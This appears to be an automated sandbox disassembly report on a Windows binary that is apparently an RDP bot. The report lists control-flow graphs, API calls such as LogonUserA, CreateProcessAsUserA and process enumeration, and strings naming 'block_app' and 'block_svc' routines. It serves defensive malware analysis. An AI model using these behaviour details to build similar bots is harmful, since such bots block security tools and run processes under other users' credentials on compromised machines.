7ff764ccb3e7 fputc 10498->10499 10502 7ff764ccbfbb 10499->10502 10500->10497 10501 7ff764ccc008 10506 7ff764ccc054 10501->10506 10507 7ff764ccb3e7 fputc 10501->10507 10503 7ff764ccb3e7 fputc 10502->10503 10505 7ff764ccbfc1 10502->10505 10503->10502 10505->10501 10509 7ff764ccb3e7 fputc 10505->10509 10512 7ff764ccb64c 10505->10512 10526 7ff764ccb420 10505->10526 10508 7ff764ccb3e7 fputc 10506->10508 10507->10501 10510 7ff764ccc068 10508->10510 10509->10505 10513 7ff764ccb666 10512->10513 10518 7ff764ccb68f 10512->10518 10517 7ff764cd026c 6 API calls 10513->10517 10514 7ff764ccb706 10515 7ff764ccb3e7 fputc 10514->10515 10525 7ff764ccb6f2 10515->10525 10516 7ff764ccb6a7 10536 7ff764cd0047 10516->10536 10517->10518 10518->10514 10518->10516 10521 7ff764ccb6f4 10523 7ff764ccb3e7 fputc 10521->10523 10522 7ff764ccb6dc 10524 7ff764ccb3e7 fputc 10522->10524 10522->10525 10523->10525 10524->10522 10525->10505 10527 7ff764cd0047 4 API calls 10526->10527 10528 7ff764ccb44f 10527->10528 10529 7ff764ccb3e7 fputc 10528->10529 10535 7ff764ccb462 10528->10535 10529->10528 10530 7ff764ccb4d1 10531 7ff764ccb4ed 10530->10531 10533 7ff764ccb3e7 fputc 10530->10533 10531->10505 10532 7ff764cd0047 4 API calls 10532->10535 10533->10530 10534 7ff764ccb3e7 fputc 10534->10535 10535->10530 10535->10532 10535->10534 10537 7ff764cd0053 10536->10537 10538 7ff764cd0058 ___mb_cur_max_func ___lc_codepage_func 10536->10538 10537->10538 10541 7ff764ccffd0 10538->10541 10542 7ff764ccfff4 WideCharToMultiByte 10541->10542 10543 7ff764ccffe4 10541->10543 10542->10543 10544 7ff764cd0034 _errno 10542->10544 10543->10544 10545 7ff764ccb6d5 10543->10545 10544->10545 10545->10521 10545->10522 10219 7ff764cc292e 10220 7ff764cc2944 10219->10220 10221 7ff764cc2a53 10220->10221 10222 7ff764cc299e 10220->10222 10223 7ff764cc14e2 24 API calls 10221->10223 10224 7ff764cc2a87 10222->10224 10225 7ff764cc29a7 10222->10225 10236 7ff764cc29d5 10223->10236 10226 7ff764cc14e2 24 API calls 10224->10226 10227 7ff764cc29bd strlen 10225->10227 10228 7ff764cc2abb 10225->10228 10226->10236 10230 7ff764cc2aef strcat 10227->10230 10227->10236 10229 7ff764cc14e2 24 API calls 10228->10229 10229->10236 10231 7ff764cc2b08 strlen strlen 10230->10231 10232 7ff764cc2bec 10230->10232 10233 7ff764cc2b38 strlen strcat 10231->10233 10231->10236 10232->10236 10252 7ff764cc3032 10232->10252 10253 7ff764cc2c1a 10232->10253 10234 7ff764cc2b74 10233->10234 10234->10232 10235 7ff764cc2b95 strlen strlen 10234->10235 10235->10232 10237 7ff764cc2bbc strlen strcat 10235->10237 10240 7ff764cc14e2 24 API calls 10236->10240 10255 7ff764cc2a3c 10236->10255 10237->10234 10238 7ff764cc3041 CreateProcessA 10241 7ff764cc3191 10238->10241 10242 7ff764cc3098 GetLastError 10238->10242 10239 7ff764cc2c32 LogonUserA 10243 7ff764cc2c63 GetLastError 10239->10243 10244 7ff764cc2d9d CreateProcessAsUserA 10239->10244 10240->10255 10246 7ff764cc14e2 24 API calls 10241->10246 10245 7ff764cc14e2 24 API calls 10242->10245 10247 7ff764cc14e2 24 API calls 10243->10247 10248 7ff764cc2eed 10244->10248 10249 7ff764cc2dfc GetLastError 10244->10249 10245->10252 10246->10255 10247->10253 10251 7ff764cc14e2 24 API calls 10248->10251 10254 7ff764cc2ce5 10248->10254 10250 7ff764cc14e2 24 API calls 10249->10250 10250->10254 10251->10254 10252->10236 10252->10238 10253->10239 10253->10254 10256 7ff764cc2f27 CloseHandle 10254->10256 10257 7ff764cc2f2d 10254->10257 10256->10257 10257->10236 10258 7ff764cc2f36 10257->10258 10258->10255 10259 7ff764cc14e2 24 API calls 10258->10259 10259->10255 11378 7ff764ccac27 11379 7ff764ccac4e 11378->11379 11380 7ff764ccacdf signal 11379->11380 11381 7ff764ccac6f 11379->11381 11382 7ff764ccacb5 11379->11382 11380->11381 11380->11382 11382->11381 11383 7ff764ccacfb signal 11382->11383 11383->11381 10546 7ff764ccde28 10547 7ff764ccde3e 10546->10547 10554 7ff764ccd126 10547->10554 10549 7ff764cce2e0 10550 7ff764cce301 10549->10550 10551 7ff764ccccd9 2 API calls 10549->10551 10551->10550 10552 7ff764ccdb86 10552->10549 10553 7ff764ccccd9 fputwc fwprintf 10552->10553 10553->10552 10555 7ff764ccd137 10554->10555 10556 7ff764ccd00f 6 API calls 10555->10556 10557 7ff764ccd164 10556->10557 10558 7ff764ccd186 10557->10558 10559 7ff764ccd179 10557->10559 10561 7ff764cccdd0 9 API calls 10558->10561 10560 7ff764cccc00 10 API calls 10559->10560 10563 7ff764ccd184 10560->10563 10562 7ff764ccd191 10561->10562 10562->10563 10564 7ff764ccca90 fputwc 10562->10564 10563->10552 10564->10562 10565 7ff764cc3222 10566 7ff764cc3230 WaitForSingleObject 10565->10566 10567 7ff764cc325c 10565->10567 10569 7ff764cc328c GetLastError 10566->10569 10571 7ff764cc3240 10566->10571 10568 7ff764cc14e2 24 API calls 10567->10568 10568->10571 10570 7ff764cc14e2 24 API calls 10569->10570 10570->10571 10572 7ff764ccf626 10573 7ff764ccf63b DeleteCriticalSection 10572->10573 10574 7ff764ccf65d 10572->10574 10573->10574 10934 7ff764ccff1f GetModuleHandleW GetProcAddress 10935 7ff764ccff73 10934->10935 10936 7ff764ccff4c LoadLibraryW GetProcAddress 10934->10936 10936->10935 10937 7ff764cd0721 DeleteCriticalSection 10266 7ff764cc5923 10267 7ff764cc5936 10266->10267 10268 7ff764cc59d4 10266->10268 10270 7ff764cc593f CreateFileA 10267->10270 10271 7ff764cc5a04 10267->10271 10269 7ff764cc14e2 24 API calls 10268->10269 10278 7ff764cc59b4 10269->10278 10273 7ff764cc5a34 GetLastError 10270->10273 10274 7ff764cc597c GetFileSize 10270->10274 10272 7ff764cc14e2 24 API calls 10271->10272 10272->10278 10277 7ff764cc599b 10273->10277 10275 7ff764cc5afa GetLastError 10274->10275 10274->10277 10275->10277 10276 7ff764cc59ab CloseHandle 10276->10278 10277->10276 10277->10278 10279 7ff764ccc51b 10280 7ff764ccc52d 10279->10280 10286 7ff764ccbbb4 10280->10286 10282 7ff764ccca67 10283 7ff764ccb3e7 fputc 10284 7ff764ccc382 10283->10284 10284->10282 10284->10283 10285 7ff764ccc1ae 19 API calls 10284->10285 10285->10284 10291 7ff764ccbbe6 10286->10291 10287 7ff764ccbd06 10288 7ff764ccbd86 10287->10288 10289 7ff764ccb3e7 fputc 10287->10289 10290 7ff764ccbda2 10288->10290 10292 7ff764ccb3e7 fputc 10288->10292 10289->10287 10290->10284 10291->10287 10293 7ff764ccb3e7 fputc 10291->10293 10292->10288 10293->10291 10941 7ff764cc131a 10942 7ff764cc1131 170 API calls 10941->10942 10943 7ff764cc132e 10942->10943 10581 7ff764cc1a19 10582 7ff764cc1b02 10581->10582 10583 7ff764cc1a32 10581->10583 10586 7ff764cc14e2 24 API calls 10582->10586 10584 7ff764cc1b2d 10583->10584 10585 7ff764cc1a3b FindResourceA 10583->10585 10588 7ff764cc14e2 24 API calls 10584->10588 10589 7ff764cc1b58 GetLastError 10585->10589 10590 7ff764cc1a58 LoadResource 10585->10590 10587 7ff764cc1af2 10586->10587 10588->10587 10591 7ff764cc14e2 24 API calls 10589->10591 10592 7ff764cc1a70 10590->10592 10593 7ff764cc1b86 GetLastError GetLastError 10590->10593 10594 7ff764cc1b79 10591->10594 10596 7ff764cc14e2 24 API calls 10592->10596 10595 7ff764cc14e2 24 API calls 10593->10595 10594->10587 10594->10593 10595->10587 10596->10587 10597 7ff764cd0619 MultiByteToWideChar 11398 7ff764cc341c 11399 7ff764cc342e GetExitCodeProcess 11398->11399 11400 7ff764cc34ad 11398->11400 11402 7ff764cc350f GetLastError 11399->11402 11403 7ff764cc3444 11399->11403 11401 7ff764cc14e2 24 API calls 11400->11401 11419 7ff764cc34d6 11401->11419 11404 7ff764cc14e2 24 API calls 11402->11404 11405 7ff764cc3452 WaitForSingleObject GetExitCodeProcess 11403->11405 11409 7ff764cc35f9 TerminateProcess 11403->11409 11403->11419 11404->11419 11406 7ff764cc36f1 GetLastError 11405->11406 11407 7ff764cc3476 11405->11407 11410 7ff764cc14e2 24 API calls 11406->11410 11420 7ff764cc33c0 11407->11420 11409->11405 11413 7ff764cc360a GetLastError 11409->11413 11410->11419 11411 7ff764cc37ac 11416 7ff764cc14e2 24 API calls 11413->11416 11414 7ff764cc14e2 24 API calls 11417 7ff764cc34ab 11414->11417 11415 7ff764cc3484 11418 7ff764cc14e2 24 API calls 11415->11418 11416->11403 11418->11417 11419->11411 11419->11414 11421 7ff764cc33ce CloseHandle CloseHandle 11420->11421 11422 7ff764cc33ec 11420->11422 11424 7ff764cc33e5 11421->11424 11423 7ff764cc14e2 24 API calls 11422->11423 11423->11424 11424->11415 11424->11419 11425 7ff764cc181b 11426 7ff764cc17b9 11425->11426 11427 7ff764cc14e2 24 API calls 11426->11427 11428 7ff764cc17d6 11427->11428 10598 7ff764cca650 10599 7ff764cca659 10598->10599 10600 7ff764cca662 10599->10600 10601 7ff764ccaebd 3 API calls 10599->10601 10601->10600 10299 7ff764cc354e 10300 7ff764cc34db 10299->10300 10301 7ff764cc37ac 10300->10301 10302 7ff764cc14e2 24 API calls 10300->10302 10303 7ff764cc3505 10302->10303 10602 7ff764ccae48 10603 7ff764ccaeb4 10602->10603 10604 7ff764ccae5a EnterCriticalSection 10602->10604 10606 7ff764ccae73 10604->10606 10605 7ff764ccaeab LeaveCriticalSection 10605->10603 10606->10605 10607 7ff764ccae98 free 10606->10607 10607->10605 11434 7ff764cce045 11435 7ff764ccdb86 11434->11435 11436 7ff764cce2e0 11435->11436 11439 7ff764ccccd9 fputwc fwprintf 11435->11439 11437 7ff764cce301 11436->11437 11438 7ff764ccccd9 2 API calls 11436->11438 11438->11437 11439->11435 11440 7ff764cc5c44 11441 7ff764cc5cdf 11440->11441 11442 7ff764cc5c60 11440->11442 11443 7ff764cc14e2 24 API calls 11441->11443 11444 7ff764cc5c79 CreateFileA 11442->11444 11445 7ff764cc5d24 11442->11445 11451 7ff764cc5d1a 11443->11451 11446 7ff764cc5cb2 GetFileTime 11444->11446 11447 7ff764cc5ccc GetLastError 11444->11447 11449 7ff764cc14e2 24 API calls 11445->11449 11446->11447 11452 7ff764cc5d57 11446->11452 11448 7ff764cc5cd9 11447->11448 11447->11452 11448->11441 11448->11452 11449->11451 11450 7ff764cc5deb CloseHandle 11450->11451 11452->11450 11452->11451

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 7ff764cc45d5-7ff764cc45f1 1 7ff764cc4687-7ff764cc46b5 call 7ff764cc14e2 0->1 2 7ff764cc45f7-7ff764cc45fa 0->2 10 7ff764cc4b39-7ff764cc4b4a 1->10 4 7ff764cc4600-7ff764cc4604 2->4 5 7ff764cc46ba-7ff764cc46e8 call 7ff764cc14e2 2->5 8 7ff764cc4610-7ff764cc4625 fopen 4->8 9 7ff764cc4606-7ff764cc460a 4->9 5->10 13 7ff764cc4720-7ff764cc4749 _errno call 7ff764cc14e2 _errno 8->13 14 7ff764cc462b-7ff764cc4640 fseek 8->14 9->8 12 7ff764cc46ed-7ff764cc471b call 7ff764cc14e2 9->12 15 7ff764cc4b53-7ff764cc4b60 10->15 16 7ff764cc4b4c 10->16 12->10 27 7ff764cc478f-7ff764cc47a3 _errno 13->27 28 7ff764cc474b-7ff764cc4758 13->28 17 7ff764cc4646-7ff764cc466f _errno call 7ff764cc14e2 _errno 14->17 18 7ff764cc47f3-7ff764cc4800 call 7ff764cd04e8 14->18 23 7ff764cc4b62-7ff764cc4b73 call 7ff764cc14e2 15->23 24 7ff764cc4b99-7ff764cc4ba0 15->24 16->15 32 7ff764cc4675-7ff764cc4682 17->32 33 7ff764cc47da-7ff764cc47ee _errno 17->33 36 7ff764cc4802 18->36 37 7ff764cc482b-7ff764cc4854 _errno call 7ff764cc14e2 _errno 18->37 35 7ff764cc4b78-7ff764cc4b8a 23->35 24->23 34 7ff764cc4b28-7ff764cc4b2b 27->34 28->27 32->1 33->34 40 7ff764cc4b35-7ff764cc4b37 34->40 41 7ff764cc4b2d-7ff764cc4b30 fclose 34->41 38 7ff764cc4b23 36->38 39 7ff764cc4808-7ff764cc480d 36->39 51 7ff764cc4856-7ff764cc4863 37->51 52 7ff764cc489a-7ff764cc48ae _errno 37->52 38->34 43 7ff764cc48b3-7ff764cc48cb fseek 39->43 44 7ff764cc4813-7ff764cc4818 39->44 40->10 46 7ff764cc4ba2-7ff764cc4bbb call 7ff764cc14e2 40->46 41->40 47 7ff764cc4941-7ff764cc496a _errno call 7ff764cc14e2 _errno 43->47 48 7ff764cc48cd-7ff764cc48d9 43->48 44->43 49 7ff764cc481e-7ff764cc4826 44->49 46->35 63 7ff764cc49b0-7ff764cc49c4 _errno 47->63 64 7ff764cc496c-7ff764cc4979 47->64 53 7ff764cc48df-7ff764cc48e5 48->53 54 7ff764cc49c9-7ff764cc49eb GetProcessHeap HeapAlloc 48->54 49->34 51->52 52->34 58 7ff764cc4b92-7ff764cc4b97 53->58 59 7ff764cc48eb 53->59 54->53 57 7ff764cc49f1-7ff764cc4a07 call 7ff764cc14e2 54->57 57->53 58->34 62 7ff764cc48f0-7ff764cc48ff 59->62 66 7ff764cc4905-7ff764cc4907 62->66 67 7ff764cc4a9e-7ff764cc4aa7 62->67 63->34 64->63 66->67 68 7ff764cc490d-7ff764cc4930 fread 66->68 69 7ff764cc4acf-7ff764cc4af2 call 7ff764cc14e2 67->69 70 7ff764cc4aa9-7ff764cc4aab 67->70 68->67 72 7ff764cc4936 68->72 74 7ff764cc4aad-7ff764cc4ab2 69->74 73 7ff764cc4af4-7ff764cc4af9 70->73 70->74 78 7ff764cc4a0c-7ff764cc4a35 _errno call 7ff764cc14e2 _errno 72->78 79 7ff764cc493c-7ff764cc493f 72->79 76 7ff764cc4b03-7ff764cc4b0c 73->76 77 7ff764cc4afb-7ff764cc4b01 73->77 74->34 80 7ff764cc4ab4-7ff764cc4acd GetProcessHeap HeapFree 74->80 76->77 77->34 83 7ff764cc4a37-7ff764cc4a44 78->83 84 7ff764cc4a7b-7ff764cc4a8f _errno 78->84 79->62 80->34 83->84 84->62
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: _errno$fclosefflushfopenfseekfwrite
                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                  • API String ID: 2897271634-4120527733
                  • Opcode ID: 56bda5fc60cecd46d586682a57799ceafb1f751f604598006fcc980bed072e31
                  • Instruction ID: 3b8bc53e928c01586d10e767895f95467ae5535e2d6e856df3ad58f0bf043364
                  • Opcode Fuzzy Hash: 56bda5fc60cecd46d586682a57799ceafb1f751f604598006fcc980bed072e31
                  • Instruction Fuzzy Hash: D2D16B21A08A07D1FA20BF57E8C07B8A761AF50785FD5A133D90D577A4EE3CE446CB24
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                  • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                  • API String ID: 1025937399-1899507746
                  • Opcode ID: 7feaebe1669a70a124df80b49270637b6d608be3fa014889acb4301ea10ee1e4
                  • Instruction ID: 6a31fdc9aac01762394c6c6de380470028e22818c535c0449c52af66da06dbc3
                  • Opcode Fuzzy Hash: 7feaebe1669a70a124df80b49270637b6d608be3fa014889acb4301ea10ee1e4
                  • Instruction Fuzzy Hash: 73F12661F0C603C2FB706F16A4D0BBE9250AF49756FE02433C60E477D5DE6DA8859A3A

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                  • String ID:
                  • API String ID: 3714283218-0
                  • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                  • Instruction ID: fd862d8d91a473b852a0ec42a43626578bc862121e482e39af54525eb090989d
                  • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                  • Instruction Fuzzy Hash: B0510A29A08A46C5EF61BF1BE8D0679B7A0AF45B84F849137DD0E47392DE2DE441CB60

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 85 7ff764cc8cfc-7ff764cc8d3f call 7ff764cc9bb9 88 7ff764cc8d45-7ff764cc8d47 85->88 89 7ff764cc927f 85->89 90 7ff764cc9284-7ff764cc9299 88->90 91 7ff764cc8d4d-7ff764cc8d59 88->91 89->90 91->90 92 7ff764cc8d5f-7ff764cc8d71 call 7ff764cc1cf4 91->92 95 7ff764cc8d73-7ff764cc8d7d call 7ff764cc1c73 92->95 96 7ff764cc8d91-7ff764cc8d97 92->96 99 7ff764cc8d82-7ff764cc8d88 95->99 98 7ff764cc8d9c-7ff764cc8d9e 96->98 100 7ff764cc8da0-7ff764cc8da3 98->100 101 7ff764cc8db7-7ff764cc8dce call 7ff764cc1c73 98->101 99->98 103 7ff764cc8d8a-7ff764cc8d8f 99->103 100->90 104 7ff764cc8da9-7ff764cc8db2 FreeLibrary 100->104 106 7ff764cc8dd4-7ff764cc8deb call 7ff764cc1c73 101->106 107 7ff764cc9257 101->107 103->100 104->90 110 7ff764cc9261 106->110 111 7ff764cc8df1-7ff764cc8e03 call 7ff764cc1c73 106->111 107->110 113 7ff764cc926b 110->113 111->113 115 7ff764cc8e09-7ff764cc8e20 call 7ff764cc1c73 111->115 116 7ff764cc9275 113->116 115->116 119 7ff764cc8e26-7ff764cc8e2c 115->119 116->89 120 7ff764cc8e76-7ff764cc8e82 119->120 120->100 121 7ff764cc8e88-7ff764cc8e8a 120->121 121->100 122 7ff764cc8e90-7ff764cc8eca call 7ff764cca1f1 121->122 125 7ff764cc8e72 122->125 126 7ff764cc8ecc-7ff764cc8f29 strlen 122->126 125->120 128 7ff764cc8f2f-7ff764cc8f5e 126->128 129 7ff764cc8e2e-7ff764cc8e49 call 7ff764cc14e2 126->129 133 7ff764cc8f64-7ff764cc8f8d GetProcessHeap HeapAlloc 128->133 134 7ff764cc8e4b-7ff764cc8e5e call 7ff764cc14e2 128->134 129->125 136 7ff764cc8f93-7ff764cc8fac 133->136 137 7ff764cc90a4-7ff764cc90c4 call 7ff764cc14e2 133->137 140 7ff764cc8e63-7ff764cc8e6b 134->140 143 7ff764cc8fb2-7ff764cc9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 136->143 144 7ff764cc90c9-7ff764cc90df call 7ff764cc14e2 136->144 137->140 140->125 146 7ff764cc906d-7ff764cc9086 call 7ff764cc14e2 143->146 147 7ff764cc91a9-7ff764cc91da call 7ff764cc795a 143->147 152 7ff764cc90e4-7ff764cc90ec 144->152 157 7ff764cc908c 146->157 158 7ff764cc910e-7ff764cc9114 146->158 155 7ff764cc91ef-7ff764cc9200 call 7ff764cc14e2 147->155 156 7ff764cc91dc-7ff764cc91ea LocalFree 147->156 152->140 154 7ff764cc90f2-7ff764cc9109 GetProcessHeap HeapFree 152->154 154->140 166 7ff764cc9205 155->166 156->152 162 7ff764cc919f-7ff764cc91a4 157->162 163 7ff764cc9092-7ff764cc909f 157->163 159 7ff764cc9211-7ff764cc9216 158->159 160 7ff764cc911a-7ff764cc9120 158->160 159->152 164 7ff764cc9153-7ff764cc9159 160->164 165 7ff764cc9122-7ff764cc9125 160->165 162->152 163->152 167 7ff764cc915f-7ff764cc9165 164->167 168 7ff764cc9239-7ff764cc923e 164->168 169 7ff764cc9140-7ff764cc9146 165->169 170 7ff764cc9127-7ff764cc912a 165->170 166->156 171 7ff764cc9243-7ff764cc9248 167->171 172 7ff764cc916b-7ff764cc9171 167->172 168->152 175 7ff764cc922f-7ff764cc9234 169->175 176 7ff764cc914c-7ff764cc9151 169->176 173 7ff764cc9130-7ff764cc9133 170->173 174 7ff764cc921b-7ff764cc9220 170->174 171->152 177 7ff764cc924d-7ff764cc9252 172->177 178 7ff764cc9177-7ff764cc917c 172->178 179 7ff764cc9225-7ff764cc922a 173->179 180 7ff764cc9139-7ff764cc913e 173->180 174->152 175->152 176->152 177->152 178->152 179->152 180->152
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                  • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                  • API String ID: 3039259412-1782951725
                  • Opcode ID: 9e86f076a43906582c62a39a38202cec83d6d18429b70aa02fdbb9b6048d0588
                  • Instruction ID: 458669b21a3dd2e0558ca9e5a014fe52575a2900f1c041699fa931c02d07810f
                  • Opcode Fuzzy Hash: 9e86f076a43906582c62a39a38202cec83d6d18429b70aa02fdbb9b6048d0588
                  • Instruction Fuzzy Hash: CBD12D21A0C683D5FB70AF06E4C07BAB250EF84748F906037DA8D46795EE7DE985CB21

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: _errno$fopenfwrite
                  • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                  • API String ID: 1336347884-544371937
                  • Opcode ID: 0b39eb2f910dab185a7673a380ff908b930334aecfe01f99a9ff25874f59d934
                  • Instruction ID: 552ff3ad90513c2691ceb0b4f4e7aff2f29231137010c884003e39476f5b3f02
                  • Opcode Fuzzy Hash: 0b39eb2f910dab185a7673a380ff908b930334aecfe01f99a9ff25874f59d934
                  • Instruction Fuzzy Hash: 3F516A61A08642C2EE20BF57E9C06B8E391AF80794FD89137D90D477A5DE2CE946CB24

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 376 7ff764cc168c-7ff764cc16b4 InitializeCriticalSectionAndSpinCount 377 7ff764cc17e0-7ff764cc1801 GetLastError call 7ff764cc14e2 376->377 378 7ff764cc16ba-7ff764cc16ee call 7ff764cc19c0 call 7ff764cc6b9b 376->378 384 7ff764cc1822-7ff764cc1828 377->384 385 7ff764cc1803 377->385 391 7ff764cc16f4-7ff764cc170b strlen 378->391 392 7ff764cc17b9-7ff764cc17d1 call 7ff764cc14e2 378->392 389 7ff764cc182e-7ff764cc1834 384->389 390 7ff764cc18eb 384->390 387 7ff764cc18e1-7ff764cc18e6 385->387 388 7ff764cc1809-7ff764cc1816 385->388 387->392 388->384 393 7ff764cc1860-7ff764cc1863 389->393 394 7ff764cc1836-7ff764cc183c 389->394 402 7ff764cc18f5-7ff764cc18fa 390->402 398 7ff764cc1723-7ff764cc1726 391->398 399 7ff764cc170d-7ff764cc1710 391->399 405 7ff764cc17d6-7ff764cc17df 392->405 395 7ff764cc1865-7ff764cc1868 393->395 396 7ff764cc187d-7ff764cc1883 393->396 400 7ff764cc1842-7ff764cc1848 394->400 401 7ff764cc1909-7ff764cc190e 394->401 403 7ff764cc186a-7ff764cc186d 395->403 404 